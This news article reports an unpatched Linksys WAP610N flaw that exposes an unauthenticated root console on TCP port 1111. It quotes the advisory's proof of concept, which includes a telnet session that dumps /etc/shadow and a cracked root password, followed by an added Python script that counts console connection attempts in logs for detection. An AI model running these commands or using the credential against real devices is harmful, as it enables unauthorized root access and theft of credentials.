A popular wireless access point made by Cisco Systems’ Linksys unit has a vulnerability that enables a remote attacker to gain root access and execute arbitrary commands on the device. The bug is several months old and Linksys has not issued a patch for it yet.
The vulnerability is in the Linksys WAP610N, a dual-band wireless access point that includes support for the 802.11n standard. The problem was identified by researchers at Secure Network, an Italian security company, which said in its advisory that it notified the vendor of the problem in June 2010. Cisco acknowledged the issue at the time, but hasn’t yet issued a patch for the vulnerability.
The vulnerability itself allows an attacker to connect to a console on the access point without authenticating and then run system commands.
“Unauthenticated remote textual administration console has been found that allow an attacker to run system command as root user,” the advisory says. Here are the details of the bug, from Secure Network’s advisory:
telnet <access-point IP> 1111
Command> system id
Output> uid=0(root) gid=0(root)
Command> system cat /etc/shadow
Output> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Output> bin:*:10933:0:99999:7:::
Output> daemon:*:10933:0:99999:7:::
Output> adm:*:10933:0:99999:7:::
Output> lp:*:10933:0:99999:7:::
Output> sync:*:10933:0:99999:7:::
Output> shutdown:*:10933:0:99999:7:::
Output> halt:*:10933:0:99999:7:::
Output> uucp:*:10933
root password is “wlan” (cracked with MDcrack http://mdcrack.openwall.net)
The WAP610N is designed for use in small and home offices and supports WPA encryption. However, the encryption is beside the point when this vulnerability is present, because an attacker can run commands on the device and doesn’t need to worry about trying to decrypt the traffic going to and from the access point.
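Because the console on TCP port 1111 asks for no credentials, any new connection to that port on an access point is worth reviewing. The Python filter below is an added example, not part of the original article or the advisory: it counts such connection attempts in gateway logs. The access-point addresses, management subnet and log lines are constructed, and the key=value log layout (modeled on Linux netfilter LOG output) is an assumption.

```python
import re
from collections import Counter
from ipaddress import ip_address, ip_network

CONSOLE_PORT = 1111  # TCP port of the unauthenticated console, per the advisory
# Assumptions (constructed values): AP inventory and the management subnet.
ACCESS_POINTS = {ip_address("192.0.2.10"), ip_address("192.0.2.11")}
MGMT_NET = ip_network("192.0.2.48/28")

# Constructed sample lines in the key=value style of Linux netfilter LOG output.
SAMPLE_LOG = """\
Jan 10 09:14:02 gw kernel: IN=eth1 OUT=eth2 SRC=198.51.100.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40112 DPT=1111 SYN URGP=0
Jan 10 09:14:02 gw kernel: IN=eth2 OUT=eth1 SRC=192.0.2.10 DST=198.51.100.7 LEN=60 PROTO=TCP SPT=1111 DPT=40112 ACK SYN URGP=0
Jan 10 09:14:40 gw kernel: IN=eth1 OUT=eth2 SRC=198.51.100.7 DST=192.0.2.10 LEN=60 PROTO=TCP SPT=40113 DPT=1111 SYN URGP=0
Jan 10 09:20:11 gw kernel: IN=eth1 OUT=eth2 SRC=192.0.2.50 DST=192.0.2.11 LEN=60 PROTO=TCP SPT=51000 DPT=1111 SYN URGP=0
Jan 10 09:21:30 gw kernel: IN=eth1 OUT=eth2 SRC=198.51.100.9 DST=192.0.2.10 LEN=40 PROTO=UDP SPT=5353 DPT=1111
Jan 10 09:22:05 gw kernel: IN=eth1 OUT=eth2 SRC=198.51.100.9 DST=192.0.2.99 LEN=60 PROTO=TCP SPT=40200 DPT=1111 SYN URGP=0
Jan 10 09:23:00 gw kernel: truncated entry SRC=198.51.100.9 DST=
"""

FIELD = re.compile(r"(\w+)=(\S+)")

def parse_line(line):
    """Return (src, dst, proto, dport, flags) or None if the line is unusable."""
    fields = dict(FIELD.findall(line))
    try:
        src, dst = ip_address(fields["SRC"]), ip_address(fields["DST"])
        return src, dst, fields["PROTO"], int(fields["DPT"]), set(line.split())
    except (KeyError, ValueError):
        return None

def console_hits(log_text):
    """Count new TCP connection attempts to the console port on known APs."""
    hits = Counter()
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, proto, dport, flags = parsed
        if proto != "TCP" or dport != CONSOLE_PORT or dst not in ACCESS_POINTS:
            continue
        if "SYN" not in flags or "ACK" in flags:  # keep only the opening SYN
            continue
        scope = "mgmt" if src in MGMT_NET else "other"
        hits[(str(src), str(dst), scope)] += 1
    return hits

if __name__ == "__main__":
    for (src, dst, scope), n in console_hits(SAMPLE_LOG).most_common():
        print(f"{n} attempt(s) {src} -> {dst}:{CONSOLE_PORT} [{scope}]")
```

Attempts tagged "mgmt" come from the assumed management subnet and still deserve a look, since the console does not distinguish administrators from anyone else who can reach the port.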